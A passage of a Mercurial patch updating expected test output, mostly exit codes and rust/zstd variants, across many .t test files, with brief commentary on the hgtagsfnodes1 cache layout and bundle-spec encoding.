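          i = args.index("-R")
          repo = args[i + 1]
          del args[i:i + 2]
          if not os.path.isdir(os.path.join(repo, ".hg")):
              # aborts before the 'potentially unsafe serve --stdio
              # invocation' check can run -- the known-bad output above
              raise SystemExit("abort: repository %s not found" % repo)
      command = next((a for a in args if not a.startswith("-")), None)
      if command not in SUPPORTED_COMMANDS:
          # fall back to the Python implementation, which re-validates
          # the invocation and prints the expected abort message
          return run_python_hg(argv)
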
Test hg-ssh using a helper script that will restore PYTHONPATH (which might
have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
@@ -463,7 +487,7 @@
remote: Permission denied
remote: pretxnopen.hg-ssh hook failed
abort: push failed on remote
- [255]
+ [100]
$ cd $TESTTMP
@@ -518,9 +542,11 @@
devel-peer-request: pairs: 81 bytes
sending hello command
sending between command
- remote: 463 (sshv1 !)
+ remote: 444 (sshv1 no-rust !)
+ remote: 463 (sshv1 rust !)
protocol upgraded to exp-ssh-v2-0003 (sshv2 !)
- remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !)
remote: 1 (sshv1 !)
devel-peer-request: protocaps
devel-peer-request: caps: * bytes (glob)
@@ -537,7 +563,7 @@
no changes found
devel-peer-request: getbundle
devel-peer-request: bookmarks: 1 bytes
- devel-peer-request: bundlecaps: 289 bytes
+ devel-peer-request: bundlecaps: 270 bytes
devel-peer-request: cg: 1 bytes
devel-peer-request: common: 122 bytes
devel-peer-request: heads: 122 bytes
@@ -655,7 +681,7 @@
remote: rollback completed
remote: pretxnchangegroup.fail hook failed
abort: push failed on remote
- [255]
+ [100]
abort during pull is properly reported as such
@@ -670,7 +696,7 @@
searching for changes
remote: abort: this is an exercise
abort: pull failed on remote
- [255]
+ [100]
abort with no error hint when there is a ssh problem when pulling
--- a/tests/test-static-http.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-static-http.t Tue Apr 20 11:01:06 2021 -0400
@@ -231,8 +231,6 @@
/.hg/bookmarks
/.hg/bookmarks.current
/.hg/cache/hgtagsfnodes1
- /.hg/cache/rbc-names-v1
- /.hg/cache/rbc-revs-v1
/.hg/dirstate
/.hg/requires
/.hg/store/00changelog.i
@@ -248,8 +246,6 @@
/remote-with-names/.hg/bookmarks.current
/remote-with-names/.hg/cache/branch2-served
/remote-with-names/.hg/cache/hgtagsfnodes1
- /remote-with-names/.hg/cache/rbc-names-v1
- /remote-with-names/.hg/cache/rbc-revs-v1
/remote-with-names/.hg/cache/tags2-served
/remote-with-names/.hg/dirstate
/remote-with-names/.hg/localtags
@@ -266,7 +262,6 @@
/remote/.hg/cache/branch2-served
/remote/.hg/cache/hgtagsfnodes1
/remote/.hg/cache/rbc-names-v1
- /remote/.hg/cache/rbc-revs-v1
/remote/.hg/cache/tags2-served
/remote/.hg/dirstate
/remote/.hg/localtags
@@ -288,8 +283,6 @@
/sub/.hg/bookmarks
/sub/.hg/bookmarks.current
/sub/.hg/cache/hgtagsfnodes1
- /sub/.hg/cache/rbc-names-v1
- /sub/.hg/cache/rbc-revs-v1
/sub/.hg/dirstate
/sub/.hg/requires
/sub/.hg/store/00changelog.i
--- a/tests/test-stream-bundle-v2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-stream-bundle-v2.t Tue Apr 20 11:01:06 2021 -0400
@@ -46,9 +46,13 @@
$ hg bundle -a --type="none-v2;stream=v2" bundle.hg
$ hg debugbundle bundle.hg
Stream params: {}
- stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True)
+ stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !)
+ stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd no-rust !)
+ stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (rust !)
$ hg debugbundle --spec bundle.hg
- none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore
+ none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !)
+ none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd no-rust !)
+ none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (rust !)
Test that we can apply the bundle as a stream clone bundle
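
The requirements in the bundle spec lines above are percent-encoded
('%3D' for '=', '%2C' for ','); decoding one makes the variants easier to
compare:

  from urllib.parse import unquote

  spec = ("none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2C"
          "generaldelta%2Crevlogv1%2Csparserevlog%2Cstore")
  print(unquote(spec))
  # none-v2;stream=v2;requirements=dotencode,fncache,generaldelta,
  # revlogv1,sparserevlog,store
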
--- a/tests/test-strip.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-strip.t Tue Apr 20 11:01:06 2021 -0400
@@ -427,7 +427,7 @@
strip failed, unrecovered changes stored in '$TESTTMP/test/.hg/strip-backup/*-temp.hg' (glob)
(fix the problem, then recover the changesets with "hg unbundle '$TESTTMP/test/.hg/strip-backup/*-temp.hg'") (glob)
abort: pretxnchangegroup.bad hook exited with status 1
- [255]
+ [40]
$ restore
$ hg log -G
o changeset: 4:443431ffac4f
--- a/tests/test-tag.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-tag.t Tue Apr 20 11:01:06 2021 -0400
@@ -290,7 +290,7 @@
$ rm -f .hg/last-message.txt
$ HGEDITOR="\"sh\" \"`pwd`/editor.sh\"" hg tag custom-tag -e
abort: pretag.test-saving-lastmessage hook exited with status 1
- [255]
+ [40]
$ test -f .hg/last-message.txt
[1]
@@ -325,7 +325,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
custom tag message
second line
--- a/tests/test-tags.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-tags.t Tue Apr 20 11:01:06 2021 -0400
@@ -104,7 +104,7 @@
0010: ff ff ff ff ff ff ff ff b9 15 46 36 26 b7 b4 a7 |..........F6&...|
0020: 73 e0 9e e3 c5 2f 51 0e 19 e0 5e 1f f9 66 d8 59 |s..../Q...^..f.Y|
$ hg debugtagscache
- 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing/invalid
+ 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing
1 b9154636be938d3d431e75a7c906504a079bfe07 26b7b4a773e09ee3c52f510e19e05e1ff966d859
Repeat with cold tag cache:
@@ -381,7 +381,7 @@
$ hg debugtagscache | tail -2
4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
- 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing/invalid
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing
$ hg tags
tip 5:8dbfe60eff30
bar 1:78391a272241
@@ -389,6 +389,77 @@
4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+If the leading 4 bytes of node hash for a record don't match an existing
+node, the entry is flagged as invalid.
+
+ >>> import os
+ >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp:
+ ... fp.seek(-24, os.SEEK_END) and None
+ ... fp.write(b'\xde\xad') and None
+
+ $ f --size --hexdump .hg/cache/hgtagsfnodes1
+ .hg/cache/hgtagsfnodes1: size=144
+ 0000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+ 0010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+ 0020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+ 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(|
+ 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.|
+ 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..|
+ 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(|
+ 0070: 78 ee 5a 2d ad bc 94 3d de ad e6 0e 0c 04 f2 a8 |x.Z-...=........|
+ 0080: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=|
+
+ $ hg debugtagscache | tail -2
+ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 invalid
+
+ $ hg tags
+ tip 5:8dbfe60eff30
+ bar 1:78391a272241
+
+BUG: If the filenode part of an entry in hgtagsfnodes is corrupt and
+tags2-visible is missing, `hg tags` aborts. Corrupting the leading 4 bytes of
+node hash (as above) doesn't seem to trigger the issue. Also note that the
+debug command hides the corruption, both with and without tags2-visible.
+
+ $ mv .hg/cache/hgtagsfnodes1 .hg/cache/hgtagsfnodes1.bak
+ $ hg debugupdatecaches
+
+ >>> import os
+ >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp:
+ ... fp.seek(-16, os.SEEK_END) and None
+ ... fp.write(b'\xde\xad') and None
+
+ $ f --size --hexdump .hg/cache/hgtagsfnodes1
+ .hg/cache/hgtagsfnodes1: size=144
+ 0000: bb d1 79 df 00 00 00 00 00 00 00 00 00 00 00 00 |..y.............|
+ 0010: 00 00 00 00 00 00 00 00 78 39 1a 27 0c 04 f2 a8 |........x9.'....|
+ 0020: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=|
+ 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(|
+ 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.|
+ 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..|
+ 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(|
+ 0070: 78 ee 5a 2d ad bc 94 3d 8d bf e6 0e 0c 04 f2 a8 |x.Z-...=........|
+ 0080: de ad de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |......B(x.Z-...=|
+
+ $ hg debugtagscache | tail -2
+ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node)
+
+ $ rm -f .hg/cache/tags2-visible
+ $ hg debugtagscache | tail -2
+ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d
+ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node)
+
+ $ hg tags
+ tip 5:8dbfe60eff30
+ bar 1:78391a272241
+
+BUG: Unless this file is restored, the `hg tags` in the next unix-permissions
+conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found"
+
+ $ mv .hg/cache/hgtagsfnodes1.bak .hg/cache/hgtagsfnodes1
+
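The offsets poked above rely on hgtagsfnodes1 being an array of fixed
24-byte records, one per revision: a 4-byte prefix of the changeset node
followed by the 20-byte .hgtags filenode (six revisions give the size=144
in the hexdumps; seeking -24 from the end hits the last record's node
prefix, while -16 lands 4 bytes into its filenode). A small reader sketch
under that assumption:

  import binascii

  RECORD_SIZE = 24

  def dump_fnodes_cache(path=".hg/cache/hgtagsfnodes1"):
      with open(path, "rb") as fp:
          data = fp.read()
      for rev in range(len(data) // RECORD_SIZE):
          rec = data[rev * RECORD_SIZE:(rev + 1) * RECORD_SIZE]
          prefix = binascii.hexlify(rec[:4]).decode()
          fnode = binascii.hexlify(rec[4:]).decode()
          print(rev, prefix, fnode)
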
#if unix-permissions no-root
Errors writing to .hgtags fnodes cache are silently ignored
@@ -405,7 +476,7 @@
$ hg blackbox -l 6
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> couldn't write cache/hgtagsfnodes1: [Errno *] * (glob)
- 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob)
+ 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6
@@ -420,7 +491,7 @@
$ hg blackbox -l 6
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing 24 bytes to cache/hgtagsfnodes1
- 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob)
+ 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob)
1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6
--- a/tests/test-template-map.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-template-map.t Tue Apr 20 11:01:06 2021 -0400
@@ -1606,7 +1606,7 @@
$ hg bisect -g 1
$ hg bisect -b 3 --noupdate
- Testing changeset 2:97054abb4ab8 (2 changesets remaining, ~1 tests)
+ Testing changeset 2:97054abb4ab8 "no person" (2 changesets remaining, ~1 tests)
$ hg log -T bisect -r 0:4
changeset: 0:1e4e1b8f71e0
bisect: good (implicit)
--- a/tests/test-transplant.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-transplant.t Tue Apr 20 11:01:06 2021 -0400
@@ -1091,7 +1091,7 @@
transaction abort!
rollback completed
abort: pretxncommit.abort hook exited with status 1
- [255]
+ [40]
$ cat >> .hg/hgrc <<EOF
> [hooks]
> pretxncommit.abort = !
--- a/tests/test-treemanifest.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-treemanifest.t Tue Apr 20 11:01:06 2021 -0400
@@ -832,10 +832,13 @@
Packed bundle
$ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg
- writing 5330 bytes for 18 files
- bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest
+ writing 5330 bytes for 18 files (no-zstd !)
+ writing 5400 bytes for 18 files (zstd !)
+ bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog, treemanifest (rust !)
$ hg debugbundle --spec repo-packed.hg
- none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest
+ none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest (no-rust !)
+ none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog%2Ctreemanifest (rust !)
#endif
--- a/tests/test-unamend.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-unamend.t Tue Apr 20 11:01:06 2021 -0400
@@ -39,7 +39,7 @@
$ hg unamend
abort: changeset must have one predecessor, found 0 predecessors
- [255]
+ [10]
Unamend on clean wdir and tip
--- a/tests/test-uncommit.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-uncommit.t Tue Apr 20 11:01:06 2021 -0400
@@ -114,12 +114,12 @@
$ hg uncommit nothinghere
abort: cannot uncommit "nothinghere"
(file does not exist)
- [255]
+ [10]
$ hg status
$ hg uncommit file-abc
abort: cannot uncommit "file-abc"
(file was not changed in working directory parent)
- [255]
+ [10]
$ hg status
Try partial uncommit, also moves bookmark
@@ -419,7 +419,7 @@
$ hg uncommit
abort: cannot uncommit merge changeset
- [255]
+ [10]
$ hg status
$ hg log -G -T '{rev}:{node} {desc}' --hidden
@@ -585,12 +585,12 @@
$ hg uncommit emptydir
abort: cannot uncommit "emptydir"
(file was untracked in working directory parent)
- [255]
+ [10]
$ cd emptydir
$ hg uncommit .
abort: cannot uncommit "emptydir"
(file was untracked in working directory parent)
- [255]
+ [10]
$ hg status
$ cd ..
--- a/tests/test-up-local-change.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-up-local-change.t Tue Apr 20 11:01:06 2021 -0400
@@ -175,7 +175,7 @@
$ hg up 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ rm b
test conflicting untracked ignored file
@@ -195,7 +195,7 @@
$ hg up 'desc("add ignored file")'
ignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
test a local add
--- a/tests/test-update-branches.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-update-branches.t Tue Apr 20 11:01:06 2021 -0400
@@ -324,7 +324,7 @@
$ hg up -q 4
abort: conflicting changes
(commit or update --clean to discard changes)
- [255]
+ [20]
$ hg up -m 4
merging a
warning: conflicts while merging a! (edit, then use 'hg resolve --mark')
--- a/tests/test-upgrade-repo.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-upgrade-repo.t Tue Apr 20 11:01:06 2021 -0400
@@ -3,6 +3,9 @@
$ cat >> $HGRCPATH << EOF
> [extensions]
> share =
+ > [format]
+ > # stabilize test across variants
+ > revlog-compression=zlib
> EOF
store and revlogv1 are required in source
@@ -21,7 +24,7 @@
> EOF
$ hg -R no-revlogv1 debugupgraderepo
- abort: cannot upgrade repository; requirement missing: revlogv1
+ abort: cannot upgrade repository; missing a revlog version
[255]
Cannot upgrade shared repositories
@@ -58,9 +61,10 @@
generaldelta: yes
share-safe: no
sparserevlog: yes
- sidedata: no
- persistent-nodemap: no
+ persistent-nodemap: no (no-rust !)
+ persistent-nodemap: yes (rust !)
copies-sdc: no
+ revlog-v2: no
plain-cl-delta: yes
compression: zlib
compression-level: default
@@ -71,11 +75,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usefncache=no
format-variant repo config default
@@ -84,11 +90,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usefncache=no --color=debug
format-variant repo config default
@@ -97,11 +105,13 @@
[formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
[formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
- [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
- [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !)
+ [formatvariant.name.mismatchdefault|persistent-nodemap:][formatvariant.repo.mismatchdefault| yes][formatvariant.config.special| yes][formatvariant.default| no] (rust !)
[formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
- [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib]
+ [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !)
+ [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !)
[formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default]
$ hg debugformat -Tjson
[
@@ -136,21 +146,23 @@
"repo": true
},
{
+ "config": false, (no-rust !)
+ "config": true, (rust !)
+ "default": false,
+ "name": "persistent-nodemap",
+ "repo": false (no-rust !)
+ "repo": true (rust !)
+ },
+ {
"config": false,
"default": false,
- "name": "sidedata",
+ "name": "copies-sdc",
"repo": false
},
{
"config": false,
"default": false,
- "name": "persistent-nodemap",
- "repo": false
- },
- {
- "config": false,
- "default": false,
- "name": "copies-sdc",
+ "name": "revlog-v2",
"repo": false
},
{
@@ -161,7 +173,8 @@
},
{
"config": "zlib",
- "default": "zlib",
+ "default": "zlib", (no-zstd !)
+ "default": "zstd", (zstd !)
"name": "compression",
"repo": "zlib"
},
@@ -177,7 +190,8 @@
performing an upgrade with "--run" will make the following changes:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
processed revlogs:
- all-filelogs
@@ -201,7 +215,8 @@
$ hg debugupgraderepo --quiet
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
processed revlogs:
- all-filelogs
@@ -216,7 +231,8 @@
performing an upgrade with "--run" will make the following changes:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -247,7 +263,8 @@
performing an upgrade with "--run" will make the following changes:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -272,7 +289,8 @@
$ hg debugupgrade --optimize re-delta-parent --quiet
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -303,9 +321,9 @@
generaldelta: no
share-safe: no
sparserevlog: no
- sidedata: no
persistent-nodemap: no
copies-sdc: no
+ revlog-v2: no
plain-cl-delta: yes
compression: zlib
compression-level: default
@@ -316,11 +334,13 @@
generaldelta: no yes yes
share-safe: no no no
sparserevlog: no yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: no yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usegeneraldelta=no
format-variant repo config default
@@ -329,11 +349,13 @@
generaldelta: no no yes
share-safe: no no no
sparserevlog: no no yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: no yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ hg debugformat --verbose --config format.usegeneraldelta=no --color=debug
format-variant repo config default
@@ -342,11 +364,13 @@
[formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes]
[formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes]
- [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
- [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !)
+ [formatvariant.name.mismatchconfig|persistent-nodemap:][formatvariant.repo.mismatchconfig| no][formatvariant.config.special| yes][formatvariant.default| no] (rust !)
[formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
+ [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no]
[formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes]
- [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib]
+ [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !)
+ [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !)
[formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default]
$ hg debugupgraderepo
repository lacks features recommended by current config options:
@@ -363,12 +387,16 @@
sparserevlog
in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange.
+ persistent-nodemap (rust !)
+ persist the node -> rev mapping on disk to speedup lookup (rust !)
+ (rust !)
performing an upgrade with "--run" will make the following changes:
requirements
preserved: revlogv1, store
- added: dotencode, fncache, generaldelta, sparserevlog
+ added: dotencode, fncache, generaldelta, sparserevlog (no-rust !)
+ added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !)
fncache
repository will be more resilient to storing certain paths and performance of certain operations should be improved
@@ -382,6 +410,9 @@
sparserevlog
